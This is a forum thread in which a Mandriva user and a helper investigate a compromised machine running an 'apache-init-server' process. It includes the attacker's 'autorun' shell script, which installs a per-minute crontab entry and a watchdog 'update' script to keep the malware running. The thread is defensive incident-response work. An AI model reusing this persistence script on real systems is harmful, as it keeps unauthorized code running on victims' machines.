apache-init-server

jean-michel · 09-26-2010, 03:02 AM

hello i have the same problem i have done all the traces asked but i don t see how i can find the problem with this traces
my distrib is mandriva 2010.0 for i586
kernel 2.6.31.13-desktop-1mnb
i have no mail server
netstat -pean | grep 80 shows connections ... of course

//These posts were moved from the 100s of apache-init-server thread to avoid confusion: the original thread OP runs Centos in a server setting and this threads OP runs Mandriva in a client setting.

jean-michel · 09-26-2010, 03:22 AM

sorry i continue
i have about 5400 lines by hour on access_log
locate has found one apache-init-server on an old partition
my address is <some.address.foo.bar>
i have several servers running (teamspeak , mumble, FMS )
no clients connected at this moment

unSpawn · 09-26-2010, 05:34 AM

Quote:

Originally Posted by jean-michel

i don t see how i can find the problem with this traces

Saying "locate has found one apache-init-server on an old partition" gives us exactly nothing in terms of information. My reply to the OP ended with the question of attaching the plain text "data.txt" file because I do not expect everybody to know what to look for. I suggest you do the same.

* BTW, please edit your last post and remove your host name. No need to advertise it.

jean-michel · 09-28-2010, 08:19 AM

first thanks for your efficient help
i have stopped my apache server at the init
but the process was still there in fact it is run in cron table
/var/tmp/vi.recover/update >/dev/null 2>&1

update shell runs another called run
run runs apache-init-server

it seems that autorun is near the beginning
cat autorun

Code:

#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > update
chmod u+x update

unSpawn · 09-28-2010, 03:38 PM

Thanks for posting information but it would be better to also post the location and information from running 'stat' on files. Now let's focus on finding out what the entry point is. Because that will dictate you what steps you must take once the investigation is complete. If you're not good at correlating logs then my Logwatch suggestion might be a good start. Since we need to ensure this is "just" a web stack compromise please also read and execute tasks from the CERT Intruder Detection Checklist and run a 'rpm -Vva|grep -v "\.\{8\}">/dev/shm/rpmvfy.log;'. Please be verbose when posting, if logs are too big for this forum please host them, pastebin or docs.google them or if all else fails contact me by email to be able to drop them off.

jean-michel · 09-29-2010, 03:51 AM

thans for the advices , but i am sorry i clear very often logs and i have not the one cooresponding to the file creation in vi.recover folder.
what is the use for rpm -Vva | grep ... for my knowledge
http://jeanmichel.gens.free.fr/divers/linux/rpmvfy.log

unSpawn · 09-29-2010, 03:54 PM

'man rpm': verify. Create a list of files to investigate attributes. Note it doesn't handle files not known to the RPMDB.

jean-michel · 09-30-2010, 05:05 AM

thank you again i will keep in touch if i have some news i stay investigating

unSpawn · 09-30-2010, 03:27 PM

During investigation you could stop the Cron daemon or in Bash deny any user from running crontabs by issuing '$>/etc/cron.allow'.

jean-michel · 10-01-2010, 01:50 AM

yes i have done it when i have read the scripts
by crontab -r
no trouble any more

unSpawn · 10-03-2010, 06:00 AM

Quote:

Originally Posted by jean-michel

no trouble any more

Until you have found out how the attacker abused your system you have not solved the problem. Please respond by reading and executing tasks from the CERT Intruder Detection Checklist and post back as verbosely as possible.